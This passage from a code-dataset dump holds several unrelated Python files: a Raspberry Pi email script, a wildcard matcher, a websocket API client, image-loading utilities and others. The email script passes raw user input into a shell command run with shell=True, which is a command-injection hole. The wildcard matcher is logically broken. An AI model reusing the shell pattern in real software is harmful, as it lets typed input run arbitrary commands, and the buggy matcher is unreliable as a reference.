brightness_by_max=brightness_by_max,\n always_apply=True),\n inputs=inputs,\n outputs=outputs,\n mode=mode,\n ds_id=ds_id)\n","repo_name":"fastestimator/fastestimator","sub_path":"fastestimator/op/numpyop/univariate/random_brightness_contrast.py","file_name":"random_brightness_contrast.py","file_ext":"py","file_size_in_byte":2330,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"31"} +{"seq_id":"18554531311","text":"instr = [\n \"\"\"Verbal fluency\n \nThis test requires that the experimenter operates the\ncomputer. Please allow them to take over now.\"\"\",\n \"\"\"Say this:\n\n\"I'm going to say a letter from the alphabet. When I say begin, I want you to tell me as\nmany words as you can that begin with that letter. You will have 60 seconds before I\ntell you to stop. None of the words can be names of people, or places, or numbers. For\nexample, if I gave you the letter T, you could say take, toy, tooth, and so forth, but\nyou should not say Tom because that is a person's name, you should not say Texas because\nthat is the name of a place, and you should not say twelve because that is a number.\nAlso, do not give me the same word with different endings. For example, if you say take,\nyou should not also say takes and taking. Do you have any questions?\"\n\nIf during the trial the subject fails to make a response for 15 seconds, say: \"Keep\ngoing\". Provide this prompt only once per trial. If the subject generates 3 consecutive\nwords that do not start with the designated letter, say, \"The letter we are using now is \n__\" Provide this prompt only once per trial.\n\nThen say this:\n\n\"The first letter is F. Ready? Begin\"\n\"\"\",\n \"\"\"Say this:\n\n\"The next letter is A. Ready? Begin\"\n\"\"\",\n \"\"\"Say this:\n\n\"The next letter is S. Ready? Begin\"\n\"\"\",\n \"\"\"Say this:\n\n\"Now we are going to do something a little different. This time, I want you to tell me\nas many animals as you can. It doesn't matter what letter they start with. You will\nhave 60 seconds before I tell you to stop. Do you have any questions? Ready? Begin.\"\n\"\"\",\n 'Begin trial',\n 'Response options:',\n 'Valid response',\n 'Invalid response',\n 'No. of responses recorded:',\n 'Countdown:',\n 'Pause trial',\n 'Continue trial',\n 'End trial',\n 'Begin/Pause/Continue/End trial:',\n 'End trial now',\n]\n","repo_name":"sammosummo/Charlie2","sub_path":"charlie2/instructions/en/verbalfluency.py","file_name":"verbalfluency.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"40914499946","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport utilities as utl\nfrom paraCP import paraCP\n\n\ndef pruning_step(n, k, a, b, former_T_hat, T_opt, lst_z_opt):\n \"\"\"\n Compute the rightmost set of the equation above\n former_T_hat: corresponds to \\bar{\\mathcal T}_{k, n-1} above\n T_opt, lst_z_opt: describe L^{opt}_{k-1, n-1}\n \"\"\"\n\n assert utl.isCPvector(former_T_hat, n - 1, k)\n assert utl.isCPvector(T_opt, n - 1, k - 1)\n assert len(lst_z_opt) == len(T_opt)\n\n lst_z = lst_z_opt + [float(\"inf\")]\n\n qfs = np.stack([utl.get_QF(n, k, a, b, tau) for tau in former_T_hat], axis=0)\n\n # Init at -infty\n qf_opt = utl.get_QF(n, k - 1, a, b, T_opt[0])\n assert lst_z[0] == -float(\"inf\")\n # These qfs satisfy the 'non-pruning' condition at - infty\n keep = utl.is_lex_leq(utl.invert_deg_one(qfs), utl.invert_deg_one(qf_opt))\n\n for beg, end, t in zip(lst_z[:-1], lst_z[1:], T_opt):\n # Induction hypothesis:\n # the qfs in ~keep were strictly above L^{opt}_{k-1, n-1}, beg included\n qf_opt = utl.get_QF(n, k - 1, a, b, t)\n differences = qfs[~keep] - qf_opt[None, :]\n bks = utl.compute_break_points(*(differences.T), beg)\n new_to_keep = (bks <= end) if end != float(\"inf\") else (bks != float(\"inf\"))\n keep[~keep] = new_to_keep\n\n return former_T_hat[keep]\n\n\ndef incr_length(tau_arr, new_n):\n \"\"\"\n Given tau_arr an array of CP vectors for sequences of length < new_n,\n update them for sequences of length new_n\n \"\"\"\n assert (tau_arr < new_n - 1).all()\n tau_arr[..., -1] = new_n - 1\n\n\ndef full_pruning(n, k, a, b, former_T_hat, T_opt, lst_z_opt):\n \"\"\"\n Compute the full \\bar{\\mathcal T}_{k, n} as describe above\n \"\"\"\n not_pruned = pruning_step(n, k, a, b, former_T_hat, T_opt, lst_z_opt)\n incr_length(not_pruned, n)\n assert utl.isCPvector(not_pruned, n, k)\n\n T_bar = np.concatenate((expand(T_opt, n), not_pruned), axis=0)\n assert utl.isCPvector(T_bar, n, k)\n\n return T_bar\n\n\ndef expand(matrix_cp_vectors, n):\n \"\"\"\n Given matrix_cp_vectors an array of CP vectors for sequences of length m < n,\n add the CP m-1 and update them for sequences of length n\n \"\"\"\n copy_matrix_cp_vectors = np.copy(matrix_cp_vectors)\n res = np.concatenate(\n (\n copy_matrix_cp_vectors,\n (n - 1) * np.ones(copy_matrix_cp_vectors.shape[0])[:, None],\n ),\n axis=1,\n )\n assert res.shape == (\n copy_matrix_cp_vectors.shape[0],\n copy_matrix_cp_vectors.shape[1] + 1,\n )\n return res\n\n\ndef paraDP(N, K, a, b, plot=False, verbose=False, pruning=False):\n \"\"\"\n Corresponds to [Algorithm 3, Article]\n \"\"\"\n # T_opt :\n # List of (N + 1) elements\n # Element 0 is unused\n # Each element : matrix of cp vectors with k cps\n T_opt = [np.array([[-1, n - 1]], dtype=np.int) for n in range(0, N + 1)]\n\n # Z_opt :\n # List of (N + 1) elements\n # Element 0 is unused\n # Each element: list of z breakpoints\n Z_opt = [[-float(\"inf\")]] * (N + 1)\n for k in range(1, K + 1):\n new_T_opt = [T_opt[0]] * (N + 1)\n new_Z_opt = [None] * (N + 1)\n\n # Case n > k\n for n in range(k + 1, N + 1):\n\n # Checks\n for m in range(k, n):\n assert utl.isCPvector(T_opt[m], m, k - 1)\n\n if verbose:\n print(f\"n={n}, k={k}\")\n\n if not (pruning and n > k + 1):\n new_T_hat = np.concatenate([expand(T_opt[m], n) for m in range(k, n)])\n if verbose:\n print(f\"T_hat={new_T_hat}\")\n\n else:\n T_bar = full_pruning(\n n,\n k,\n a,\n b,\n T_hat.astype(np.int),\n T_opt[n - 1].astype(np.int),\n Z_opt[n - 1],\n )\n if verbose:\n print(f\"T_bar={T_bar}\")\n new_T_hat = T_bar\n T_hat = np.unique(new_T_hat, axis=0)\n lst_z, lst_t = paraCP(\n n, k, a, b, T_hat.astype(np.int), plot=(k == K and n == N) and plot\n )\n new_T_opt[n] = np.array(lst_t)\n new_Z_opt[n] = lst_z\n\n T_opt = new_T_opt\n Z_opt = new_Z_opt\n return lst_z, T_opt[N]\n","repo_name":"tobyj2/time-series-class-project","sub_path":"paraDP.py","file_name":"paraDP.py","file_ext":"py","file_size_in_byte":4334,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"29350240889","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plot\n\n## Ejercicio 5\n\ndef greyscale_histogram(img):\n counts, bins, bars = plot.hist(img.ravel(), bins=256)\n plot.show()\n\ndef main(argv):\n\tif (len(argv) < 1):\n\t\tprint(\"Error de parámetros.\")\n\t\tprint(\"Uso: ejercicio5.py img1\")\n\t\tprint(\"\")\n\t\treturn\n\n\timg1 = cv2.imread(argv[0])\n\tif (img1 is None):\n\t\tprint(\"Error al cargar la imagen\")\n\t\treturn\n\n\tgreyscale_histogram(img1)\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n","repo_name":"SpicyCactuar/computer-vision","sub_path":"practica-1/ejercicio5.py","file_name":"ejercicio5.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34467495135","text":"import pygame\r\nfrom load_sliced_sprites import *\r\n\r\n##### Explosions #####\r\n\r\nclass Explosion(pygame.sprite.Sprite):\r\n\r\n \r\n\r\n def __init__(self, position):\r\n \r\n pygame.sprite.Sprite.__init__(self, self.groups)\r\n self.explosion_images = load_sliced_sprites(50, 50, os.path.join('Resources','Images','Animations','explosiontileset.png'))\r\n for image in self.explosion_images:\r\n image.set_colorkey(image.get_at((0, 0))) # issues here suppost to make transparent\r\n self.frame = 0 # starting image\r\n self.image = self.explosion_images[self.frame] # use frame to get correct image\r\n self.rect = self.image.get_rect()\r\n self.NEW_IMAGE = 3 # time between images\r\n self.new_image = self.NEW_IMAGE # so we can reset the timer\r\n self.rect.center = position # center = position that was recieved when we called this \r\n\r\n\r\n def update(self, player):\r\n self.new_image -= 1 # count down till next image is used\r\n if self.new_image <= 0: # when we need to change the image\r\n self.frame += 1 # switch to next image\r\n self.new_image = self.NEW_IMAGE # reset image timer\r\n \r\n if self.frame >= (len(self.explosion_images) - 1): # when we run out of images\r\n self.kill() # die you wasteful explosion\r\n self.image = self.explosion_images[self.frame] # pick the image based on what frame we are on\r\n","repo_name":"joshuakcockrell/color-tower-defense","sub_path":"explosion.py","file_name":"explosion.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"31"} +{"seq_id":"5047594768","text":"from gpiozero import LED\nfrom gpiozero import PWMLED\nfrom gpiozero import Button\nfrom time import sleep\n\nled3 = LED(13)\nled2 = LED(19)\nled1 = LED(26)\nled4 = LED(6)\nled5 = LED(5)\nbutton4 = Button(21)\nbutton3 = Button(20)\nbutton2 = Button(16)\n\ndef allon():\n led1.on()\n led2.on()\n led3.on()\n led4.on()\n led5.on()\n \ndef alloff():\n led1.off()\n led2.off()\n led3.off()\n led4.off()\n led5.off()\n\n\ndef alarm():\n allon()\n sleep(0.5)\n alloff()\n sleep(0.5)\n allon()\n sleep(0.5)\n alloff()\n sleep(0.5)\n allon()\n sleep(0.5)\n alloff()\n sleep(0.5)\n allon()\n sleep(0.5)\n alloff()\n sleep(0.5)\n allon()\n sleep(0.5)\n alloff()\n sleep(0.5)\n allon()\n sleep(0.5)\n alloff()\n sleep(0.5)\n\nprint(\"Mail Sender\")\nallon()\nalarm()\nsleep(1)\nprint(\"SMTP\")\nprint(\"G-Mail Server\")\nalloff()\nsleep(1)\nprint(\"Connected\")\nprint(\"...\")\nsleep(1)\nled1.on()\nprint(\"...\")\nsleep(1)\nprint(\"...\")\nsleep(1)\nprint(\"...\")\nsleep(1)\nprint(\"Hello, My name is MailBot.\")\nsleep(1)\nprint(\"I can send emails for you.\")\nsleep(1)\nprint(\"Let me show you.\")\nsleep(1)\nsleep(1)\nname=input(\"What is your name?\")\nprint(\"Oooo, nice to meet you\", name,\"!\")\nsleep(1)\nled2.on()\nprint(\"So\", name, \" let's send an email.\")\nsleep(1)\nprint(\"Your email should have a title.\")\nsleep(1)\ntitle=input(\"Title:\")\nsleep(1)\nled3.on()\nprint(\"Ok, Now write something in the body of the email.\")\nsleep(1)\nbody=input(\"Body:\")\nprint(\"Thank you!\")\nsleep(1)\nled4.on()\nprint(\"I will put them together.\")\nsleep(1)\nprint(\"...\")\nsleep(1)\nprint(\"...\")\nsleep(1)\nprint(\"Done!\")\nsleep(1)\nprint(\"Your email looks like this now:\")\nprint(\"...............................\")\nprint(\"Title:\")\nprint(title)\nprint(\"Body:\")\nprint(body)\nprint(\"...............................\")\nprint(\"End\")\nsleep(1)\nprint(\"The email is almost ready now. The address is missing.\")\nsleep(1)\nprint(\"I'll put a random one...:))\")\nsleep(1)\naddress=input(\"Address please:\")\nprint(\"Ok, so now is ready.\")\nsleep(1)\nled5.on()\n\nprint(\"Your email looks like this now:\")\nprint(\"Address:\")\nprint(address)\nprint(\"...............................\")\nprint(\"Title:\")\nprint(title)\nprint(\"Body:\")\nprint(body)\nprint(\"...............................\")\nprint(\"End\")\nsleep(1)\n\nprint(\"In order for me to send the email, there is one more step.\")\nsleep(1)\nprint(\"...\")\nsleep(1)\nprint(\"...\")\nsleep(1)\nprint(\"We need to confirm the transaction.\")\nalarm()\nsleep(1)\nprint(\"We will use a button for this.\")\nprint(\"...\")\nprint(\"Now press the SECRET button for the...\")\nsleep(5)\nbutton3.wait_for_press()\nalarm()\nprint(\"MAGIC to work.\")\nalarm()\nsleep(1)\n\n\nimport subprocess\ne = 'echo '+str(body)+' | mail -s '+str(title)+' '+str(address)\nsubprocess.call(e,shell=True)\n\n\nprint(\"Done!\")\n\nalloff()\n","repo_name":"vely44/KISAS","sub_path":"Fan.py","file_name":"Fan.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5821174124","text":"def wildcard_match(pattern, string):\n string_idx = 0\n pattern_idx = 0\n while pattern_idx < len(pattern):\n p = pattern[pattern_idx]\n if p == '*':\n string_idx = pattern_idx\n original_idx = pattern_idx\n pattern_idx += 1\n p = pattern[pattern_idx]\n s = string[string_idx]\n while s == p:\n string_idx += 1\n s = string[string_idx]\n\n if string_idx - original_idx == 0:\n return False\n pattern_idx += 1\n elif p == '?':\n string_idx = pattern_idx\n pattern_idx += 1\n s = string[string_idx]\n p = pattern[pattern_idx]\n if s == p:\n string_idx += 1\n pattern_idx += 1\n else:\n if p != string[string_idx]:\n return False\n string_idx += 1\n pattern_idx += 1\n\n if pattern_idx == string_idx:\n return True\n\n return False\n\ndef main():\n pattern = \"*ab\"\n string = \"aaaab\"\n print(wildcard_match(pattern, string))\n\n pattern = \"?ab\"\n string = \"bb\"\n print(wildcard_match(pattern, string))\n\nimport unittest\n\nclass Test(unittest.TestCase):\n def test(self):\n self.assertEqual(wildcard_match(\"*ab\", \"aaaab\"), True)\n self.assertEqual(wildcard_match(\"?ab\", \"bb\"), False)\n self.assertEqual(wildcard_match(\"?ab\", \"b\"), True)\n self.assertEqual(wildcard_match(\"?ab\", \"ab\"), True)\n\nif __name__ == \"__main__\":\n main()","repo_name":"ssarangi/algorithms","sub_path":"program_creek/wildcard_matching.py","file_name":"wildcard_matching.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"9421585876","text":"from __future__ import print_function\nimport json\nimport threading\nimport time\nimport traceback\nimport sys\n\nimport six\n\nfrom ._protocol import CONNECT, CONNECTED, FAILED, METHOD, RESULT, GET_HISTORICAL_DATA, \\\n GET_METADATA, SET_METADATA, GET_REAL_TIME_DATA, SET_REAL_TIME_DATA\nfrom .exceptions import JCoreAPIException, JCoreAPITimeoutException, JCoreAPIAuthException, \\\n JCoreAPIConnectionClosedException, JCoreAPIUnexpectedMessageException, \\\n JCoreAPIErrorResponseException, JCoreAPIInvalidMessageException\n\ndef _default_on_unexpected_exception(exc_info):\n print(*traceback.format_exception(*exc_info), file=sys.stderr)\n\n\ndef _wait(cv, timeout):\n startTime = time.time()\n cv.wait(timeout)\n if timeout and time.time() - startTime >= timeout:\n raise JCoreAPITimeoutException('operation timed out')\n\n\ndef _from_protocol_error(error):\n if error:\n if isinstance(error, six.text_type):\n return error\n if isinstance(error, dict):\n return error[six.u('error')] if six.u('error') in error else error\n\ndef _get_list(type_, items, name=\"items\"):\n \"\"\"\n Normalizes maybe item or list of items to maybe list\n \"\"\"\n if isinstance(items, type_):\n return [items]\n if items:\n assert isinstance(items, list), name + \" must be a \" + type_ + \" or list if present\"\n for channelid in items:\n assert isinstance(channelid, type_), name + \" must all be of type \" + type_\n return items\n\ndef _get_channelids(channelids=None):\n return _get_list(six.string_types, channelids, name=\"channelids\")\n\nclass JCoreAPIConnection:\n \"\"\"\n A connection a to jcore.io server.\n\n sock: the socket to communicate with. It must have these methods\n send(message): sends a message\n recv(): receives a message\n close(): closes the socket\n auth_required: whether authentication is required.\n If so, methods will throw an error if the client is not authenticated.\n default is True\n \"\"\"\n def __init__(self, sock, auth_required=True, on_unexpected_exception=_default_on_unexpected_exception):\n self._lock = threading.RLock()\n self._sock = sock\n self._auth_required = auth_required\n self._on_unexpected_exception = on_unexpected_exception\n self._started = False\n self._closed = False\n self._authenticating = False\n self._authenticated = False\n self._autherror = None\n self._authcv = threading.Condition(self._lock)\n\n self._cur_method_id = 0\n self._method_calls = {}\n\n self._recv_thread = threading.Thread(\n target=self._run_recv_thread, name=\"jcore.io receiver\")\n self._recv_thread.daemon = True\n\n def _run_recv_thread(self):\n # skip locking in this method since it's only reading fields\n sock = self._sock\n\n if not sock:\n return\n\n while not self._closed:\n try:\n self._handle_message(sock.recv())\n except JCoreAPITimeoutException:\n continue\n except JCoreAPIConnectionClosedException as error:\n self.close(error, sock_is_closed=True)\n return\n except Exception as e:\n try:\n self._on_unexpected_exception(sys.exc_info())\n except Exception as e:\n traceback.print_exc()\n\n def authenticate(self, token):\n \"\"\"\n authenticate the client.\n\n token: the token field from the decoded base64 api token.\n \"\"\"\n assert isinstance(token, six.text_type) and len(\n token) > 0, \"token must be a non-empty unicode string\"\n\n self._lock.acquire()\n try:\n if self._authenticated:\n raise JCoreAPIAuthException(\"already authenticated\")\n if self._authenticating:\n raise JCoreAPIAuthException(\n \"authentication already in progress\")\n\n self._authenticating = True\n self._autherror = None\n\n self._send(CONNECT, {six.u('token'): token})\n\n while self._authenticating:\n _wait(self._authcv, self._sock.gettimeout())\n\n if self._autherror:\n raise self._autherror\n finally:\n self._authenticating = False\n self._lock.release()\n \n def _require_auth(self):\n self._lock.acquire()\n try:\n if self._closed:\n raise JCoreAPIConnectionClosedException(\n \"connection is already closed\")\n if self._authenticating:\n raise JCoreAPIAuthException(\n \"authentication has not finished yet\")\n if self._auth_required and not self._authenticated:\n raise JCoreAPIAuthException(\"not authenticated\")\n finally:\n self._lock.release()\n\n def close(self, error=JCoreAPIConnectionClosedException('connection closed'), sock_is_closed=False):\n \"\"\"\n Close this connection.\n\n error: the error to raise from all outstanding requests.\n sock_is_closed: if True, will not redundantly call close() on the socket.\n \"\"\"\n self._lock.acquire()\n try:\n if self._closed:\n return\n\n if self._authenticating:\n self._autherror = error\n self._authcv.notify_all()\n\n for method_call in six.itervalues(self._method_calls):\n method_call['error'] = error\n method_call['done'] = True\n method_call['cv'].notify()\n\n self._method_calls.clear()\n\n self._authenticating = False\n self._authenticated = False\n self._closed = True\n\n if not sock_is_closed:\n self._sock.close()\n self._sock = None\n\n finally:\n self._lock.release()\n\n def get_real_time_data(self, channelids=None):\n \"\"\"\n Gets real-time data from the server.\n\n channelids: a string or list of strings specifying the channel id(s) to get data for\n\n returns: a JSON Real-Time Data object \n (https://jcoreio.gitbooks.io/jcore-api-py/content/docs/api/schema/realTimeData.md)\n \"\"\"\n return self._call(GET_REAL_TIME_DATA, [{'channelIds': _get_channelids(channelids)}] if channelids else [])\n\n def set_real_time_data(self, data):\n \"\"\"\n Sets real-time data on the server.\n\n data: a dict mapping from channel id to value\n \"\"\"\n assert isinstance(data, dict), \"data must be a dict\"\n self._call(SET_REAL_TIME_DATA, [data])\n\n def get_metadata(self, channelids=None):\n \"\"\"\n Gets metadata from the server.\n\n channelids: a string or list of strings specifying the channel id(s) to get data for\n\n returns: a dict mapping from channel id to JSON Metadata object\n (https://jcoreio.gitbooks.io/jcore-api-py/content/docs/api/schema/metadata.md)\n \"\"\"\n return self._call(GET_METADATA, [{'channelIds': _get_channelids(channelids)}] if channelids else [])\n\n def set_metadata(self, metadata):\n \"\"\"\n Sets metadata on the server.\n\n metadata: a dict mapping from channel id to JSON Metadata object\n \"\"\"\n assert isinstance(metadata, dict), \"metadata must be a dict\"\n self._call(SET_METADATA, [metadata])\n\n def get_historical_data(self, channelids, begintime, endtime):\n \"\"\"\n Gets historical data from the server.\n\n channelids: a string or list of strings specifying the channel id(s) to get data for\n begintime: the beginning of the time range to fetch; either an ISO Date\n string or a numeric timestamp (milliseconds since the epoch)\n endtime: the end of the time range to fetch; either an ISO Date\n string or a numeric timestamp (milliseconds since the epoch)\n\n returns: a JSON Historical Data object\n (https://jcoreio.gitbooks.io/jcore-api-py/content/docs/api/schema/historicalData.md)\n \"\"\"\n channelids = _get_channelids(channelids)\n assert isinstance(begintime, int) or isinstance(begintime, six.string_types), \\\n \"begintime must be a string or number\"\n assert isinstance(endtime, int) or isinstance(endtime, six.string_types), \\\n \"endtime must be a string or number\"\n return self._call(GET_HISTORICAL_DATA, [{'channelIds': channelids, 'beginTime': begintime, 'endTime': endtime}])\n\n def _call(self, method, params):\n assert isinstance(method, str) and len(\n method) > 0, \"method must be a non-empty str\"\n\n method_call = None\n _id = None\n\n self._lock.acquire()\n try:\n self._require_auth()\n _id = str(self._cur_method_id)\n self._cur_method_id += 1\n method_call = {\n 'done': False,\n 'error': None,\n 'result': None,\n 'cv': threading.Condition(self._lock) \n }\n self._method_calls[_id] = method_call\n\n self._send(METHOD, {\n 'id': _id,\n 'method': method,\n 'params': params\n })\n\n while not method_call['done']:\n _wait(method_call['cv'], self._sock.gettimeout())\n\n if method_call['error']:\n raise method_call['error']\n return method_call['result']\n finally:\n if _id in self._method_calls:\n del self._method_calls[_id]\n self._lock.release()\n\n def _send(self, message_name, message):\n sock = None\n\n self._lock.acquire()\n try:\n if not self._started:\n self._started = True\n self._recv_thread.start()\n\n sock = self._sock\n if not sock or self._closed:\n raise JCoreAPIConnectionClosedException(\"connection closed\")\n finally:\n self._lock.release()\n\n message['msg'] = message_name\n sock.send(json.dumps(message))\n\n def _handle_message(self, event):\n message = json.loads(event)\n if six.u('msg') not in message:\n raise JCoreAPIInvalidMessageException(\n \"msg field is missing\", message)\n\n msg = message[six.u('msg')]\n if not (isinstance(msg, six.text_type) and len(msg) > 0):\n raise JCoreAPIInvalidMessageException(\n \"msg must be a non-empty unicode string\", message)\n\n # Synchronize all message handling to ensure we'll ignore messages\n # after the connection has closed\n self._lock.acquire()\n try:\n if self._closed:\n # don't raise an exception here, it has already been\n # handled in _run_recv_thread\n return\n\n if msg == CONNECTED:\n self._handle_connected_message(message)\n elif msg == FAILED:\n self._handle_failed_message(message)\n elif msg == RESULT:\n self._handle_result_message(message)\n else:\n self._handle_unknown_message(message) \n finally:\n self._lock.release()\n\n def _handle_connected_message(self, message):\n self._lock.acquire()\n try:\n if not self._authenticating:\n raise JCoreAPIUnexpectedMessageException(\n \"unexpected connected message\", message)\n self._authenticating = False\n self._authenticated = True\n self._authcv.notify_all()\n finally:\n self._lock.release()\n\n def _handle_failed_message(self, message):\n self._lock.acquire()\n try:\n if not self._authenticating:\n raise JCoreAPIUnexpectedMessageException(\n \"unexpected auth failed message\", message)\n error_msg = \"authentication failed\" if self._authenticating else \"unexpected auth failed message\"\n protocol_error = _from_protocol_error(\n message[six.u('error')]) if six.u('error') in message else None\n self._authenticating = False\n self._authenticated = False\n self._autherror = JCoreAPIAuthException(\n error_msg + (\": \" + protocol_error if protocol_error else \"\"), message)\n self._authcv.notify_all()\n finally:\n self._lock.release()\n\n def _handle_result_message(self, message):\n self._lock.acquire()\n try:\n msg = message[six.u('msg')]\n\n _id = message[six.u('id')]\n if not (isinstance(_id, six.text_type) and len(_id) > 0):\n raise JCoreAPIInvalidMessageException(\n \"id must be a non-empty unicode string\", message)\n\n if _id not in self._method_calls:\n raise JCoreAPIUnexpectedMessageException(\n \"method call not found: \" + _id, message)\n\n method_call = self._method_calls[_id]\n\n if six.u('error') in message:\n error = message[six.u('error')]\n if isinstance(error, JCoreAPIException):\n method_call['error'] = error\n else:\n method_call['error'] = JCoreAPIErrorResponseException(\n _from_protocol_error(error), message)\n elif six.u('result') in message:\n method_call['result'] = message[six.u('result')]\n method_call['done'] = True\n method_call['cv'].notify()\n finally:\n self._lock.release()\n\n def _handle_unknown_message(self, message):\n msg = message[six.u('msg')]\n if six.u('id') not in message:\n if msg != RESULT:\n raise JCoreAPIInvalidMessageException(\n 'invalid message type: ' + msg, message)\n else:\n raise JCoreAPIInvalidMessageException(\n \"id field is missing\", message)\n\n if six.u('error') not in message:\n message[six.u('error')] = JCoreAPIInvalidMessageException(\n 'invalid message type: ' + msg, message)\n\n # handle it like a result message so that error gets raised on the\n # caller for its id\n return self._handle_result_message(message)\n","repo_name":"jcoreio/jcore-api-py","sub_path":"jcore_api/_connection.py","file_name":"_connection.py","file_ext":"py","file_size_in_byte":14561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39264365009","text":"for _ in range(int(input())):\r\n s = input()\r\n coin = {\r\n \"TTT\": 0,\r\n \"TTH\": 0,\r\n \"THT\": 0,\r\n \"THH\": 0,\r\n \"HTT\": 0,\r\n \"HTH\": 0,\r\n \"HHT\": 0,\r\n \"HHH\": 0,\r\n }\r\n for x in range(38):\r\n coin[s[x : x + 3]] += 1\r\n print(*coin.values())","repo_name":"sotthang/coding_study","sub_path":"백준/Bronze/2684. 동전 게임/동전 게임.py","file_name":"동전 게임.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10113800717","text":"import shutil\nimport os\n\ndef clean_description(lines):\n \n skip_prefixes = [\"Chandra Release -\", \"Visual Description:\"]\n return [line for line in lines if not any(line.startswith(prefix) for prefix in skip_prefixes) and line.strip() != '']\n\n# Duplicate the pairs folder\nsrc_folder = 'pairs'\ndst_folder = 'full_pairs'\n\nif os.path.exists(dst_folder):\n shutil.rmtree(dst_folder) # remove it if it already exists\nshutil.copytree(src_folder, dst_folder)\n\n# modify description_text files\nfor i in range(len(os.listdir(dst_folder))):\n pair_folder = f'{dst_folder}/pair_{i}'\n desc_file_path = f'{pair_folder}/description.txt' #our naming is consistent\n\n # does the description file exist?\n if os.path.exists(desc_file_path):\n with open(desc_file_path, 'r', encoding='utf-8', errors='replace') as desc_file:\n lines = desc_file.readlines()\n\n cleaned_lines = clean_description(lines)\n\n with open(desc_file_path, 'w', encoding='utf-8') as desc_file:\n desc_file.writelines(cleaned_lines)\n print(f'Modified: {desc_file_path}')\n\n# read into a list\nwith open('bad_texts.txt', 'r') as file:\n bad_texts = file.readlines()\n\n# add a bad txt file\nfor i, bad_text in enumerate(bad_texts):\n pair_folder = f'{dst_folder}/pair_{i}'\n \n # just to be safe\n if os.path.exists(pair_folder):\n with open(f'{pair_folder}/b_description.txt', 'w') as bad_text_file:\n bad_text_file.write(bad_text)\n print(f'Bad text {i} written: {pair_folder}/b_description.txt')\n","repo_name":"areshva/alttext","sub_path":"bad.py","file_name":"bad.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74969619607","text":"import numpy as np\nimport os\nfrom tqdm import tqdm\nimport cv2\nimport random\nfrom sklearn.utils import shuffle\nfrom sklearn.preprocessing import OneHotEncoder\nimport pandas as pd\n\n### Reading data functions\ndef imread(category, image, imagePath, shape, includeSides):\n path = os.path.join(imagePath,image) # create path to dogs and cats\n image = cv2.imread(path, cv2.IMREAD_GRAYSCALE);\n if (includeSides == 0):\n image = image[0:400,0:400];\n image = cv2.resize(image, shape);\n image = np.asarray(image);\n return [image, category];\n\ndef createData(path, size, label, limit, includeSides):\n print(path)\n print(\"loading \" + label + \" data\")\n\n data = [];\n count = 0;\n filecount = 0;\n\n for imageFile in tqdm(os.listdir(path)):\n if filecount > limit:\n break\n\n # Label depending on the name of the image\n if (imageFile.find(\"HV\") != -1):\n data.append(imread('H', imageFile, path, size, includeSides));\n filecount += 1;\n elif (imageFile.find(\"PA\") != -1) or (imageFile.find(\"PT\") != -1):\n data.append(imread('P', imageFile, path, size, includeSides));\n filecount += 1;\n else:\n print(\"\");\n print(\"Unidintified file: \" + imageFile);\n print(\"\");\n\n # Randomize data for later input into neural net\n data = shuffle(data, random_state = 0);\n return np.asarray(data);\n\ndef preprocessImages(images):\n # Remove mean from set of images\n avgImg = findAverageImg(images);\n images = removeAverage(images, avgImg);\n # normalize variance from 0~255 to 0~1\n images = images.astype('float32') / 255;\n avgImg = avgImg.astype('float32') / 255;\n\n return images, avgImg;\n\n# Loads and reshapes into useful training data from filepath\n# filePath: specifies the folders with the images\n# imageSideLength: all images are squares, this specifies the side length of the square\n# imageNumberLimit: max images the function will load\n# All images projections of 3D volume scans are a 400*400px\n# front projection with 400*200 side projections one function loads with With\n# one loads without\n#TODO; this is fucking garbage code\ndef loadTrainingData(filePath, imageSideLength, imageNumberLimit):\n ### Creating data\n trainingData = createData(filePath, (imageSideLength, imageSideLength), \"training\", imageNumberLimit, 0);\n images = [];\n classifications = [];\n\n for data, categories in trainingData:\n images.append(data);\n classifications.append(categories);\n\n images = np.asarray(images);\n classifications = np.asarray(classifications);\n\n # Add dimention in X data so that keras can read it correctly\n images = images[..., np.newaxis];\n\n # Preprocess images\n images, average = preprocessImages(images);\n\n classifications = pd.DataFrame(classifications, columns = [\"Type\"]);\n\n encoder = OneHotEncoder(sparse = False);\n classifications = encoder.fit_transform(classifications);\n\n return [images, average, classifications];\n\ndef loadTrainingDataWithSides(filePath, imageSideLength, imageNumberLimit):\n ### Creating data\n trainingData = createData(filePath, (imageSideLength, imageSideLength), \"training\", imageNumberLimit, 1);\n\n images = [];\n classifications = [];\n\n for data, categories in trainingData:\n images.append(data);\n classifications.append(categories);\n\n images = np.asarray(images);\n classifications = np.asarray(classifications);\n\n classifications = pd.DataFrame(classifications, columns = [\"Type\"]);\n\n encoder = OneHotEncoder(sparse = False);\n classifications = encoder.fit_transform(classifications);\n\n # Add dimention in X data so that keras can read it correctly\n images = images[..., np.newaxis];\n\n # Preprocess images\n images, average = preprocessImages(images);\n\n return [images, average, classifications];\n\n############ Normalizing data ################################\n# Calculate the average image in the dataset\ndef findAverageImg(data):\n sumImg = np.zeros(data[0].shape, dtype = np.double);\n numOfImages = data.shape[0]\n for i in range(0, numOfImages):\n sumImg = sumImg + data[i];\n\n sumImg = sumImg/numOfImages\n return sumImg;\n\n# If given an average image, remove it from each image\ndef removeAverage(data, average):\n 